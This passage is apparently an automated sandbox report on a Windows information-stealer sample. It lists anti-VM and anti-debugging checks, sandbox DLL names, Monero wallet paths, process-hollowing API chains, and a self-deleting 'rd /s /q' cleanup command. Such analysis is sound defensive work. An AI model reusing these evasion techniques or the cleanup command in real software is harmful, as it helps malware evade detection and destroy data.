                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.190000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 1004, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR
                          Country aware sample found (crashes after keyboard check)
                          Source: c:\users\user\desktop\umrfwhyjui.exeEvent Logs and Signature results: Application crash and keyboard check
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: UMrFwHyjUi.exeBinary or memory string: DIR_WATCH.DLL
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                          Source: UMrFwHyjUi.exeBinary or memory string: SBIEDLL.DLL
                          Source: UMrFwHyjUi.exeBinary or memory string: API_LOG.DLL
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,2_2_0040180D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI coverage: 3.7 %
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI coverage: 6.3 %
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 8024Thread sleep count: 82 > 30Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00410DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EC3h2_2_00410DB0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001AD2FE FindFirstFileExW,0_2_001AD2FE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001AD2FE FindFirstFileExW,1_2_001AD2FE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00416013
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041547D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409CF1
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414D08
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00401D80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D59B
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5B4
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF22
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B914
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B4D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040CD0C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415182
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00410F8F GetSystemInfo,wsprintfA,2_2_00410F8F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: Amcache.hve.5.drBinary or memory string: VMware
                          Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI call chain: ExitProcess graph end nodegraph_2-73878
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI call chain: ExitProcess graph end nodegraph_2-73894
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeAPI call chain: ExitProcess graph end nodegraph_2-75218
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00192F17 LdrInitializeThunk,0_2_00192F17
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019A085 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019A085
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00418995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418995
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00192F7C mov edi, dword ptr fs:[00000030h]0_2_00192F7C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001C34EA mov eax, dword ptr fs:[00000030h]0_2_001C34EA
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001C350D mov eax, dword ptr fs:[00000030h]0_2_001C350D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001C3502 mov eax, dword ptr fs:[00000030h]0_2_001C3502
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001DA63C mov eax, dword ptr fs:[00000030h]0_2_001DA63C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001A3BBE mov ecx, dword ptr fs:[00000030h]0_2_001A3BBE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001ACC6F mov eax, dword ptr fs:[00000030h]0_2_001ACC6F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001A3BBE mov ecx, dword ptr fs:[00000030h]1_2_001A3BBE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001ACC6F mov eax, dword ptr fs:[00000030h]1_2_001ACC6F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_00192F7C mov edi, dword ptr fs:[00000030h]1_2_00192F7C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004014AD mov eax, dword ptr fs:[00000030h]2_2_004014AD
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040148A mov eax, dword ptr fs:[00000030h]2_2_0040148A
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004014A2 mov eax, dword ptr fs:[00000030h]2_2_004014A2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004185DB mov eax, dword ptr fs:[00000030h]2_2_004185DB
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004185DC mov eax, dword ptr fs:[00000030h]2_2_004185DC
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001AE177 GetProcessHeap,0_2_001AE177
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019A085 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019A085
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019A212 SetUnhandledExceptionFilter,0_2_0019A212
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001A0B69 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001A0B69
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_00199E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00199E74
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_0019A085 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0019A085
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_0019A212 SetUnhandledExceptionFilter,1_2_0019A212
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001A0B69 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_001A0B69
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_00199E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00199E74
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041D05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041D05A
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041D9DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041D9DC
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0042767E SetUnhandledExceptionFilter,2_2_0042767E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CC2AC62

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 1004, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_0040F51F
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeMemory written: C:\Users\user\Desktop\UMrFwHyjUi.exe base: 400000 value starts with: 4D5AJump to behavior
                          Searches for specific processes (likely to inject)
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_0041247D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00412554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00412554
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Users\user\Desktop\UMrFwHyjUi.exe "C:\Users\user\Desktop\UMrFwHyjUi.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exitJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CC74760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6CC74760
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB51C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,2_2_6CB51C30
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001C317D cpuid 0_2_001C317D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,0_2_001B0031
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,0_2_001A7026
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,0_2_001B007C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,0_2_001B0117
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_001B01A2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,0_2_001B03F5
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,0_2_001E7493
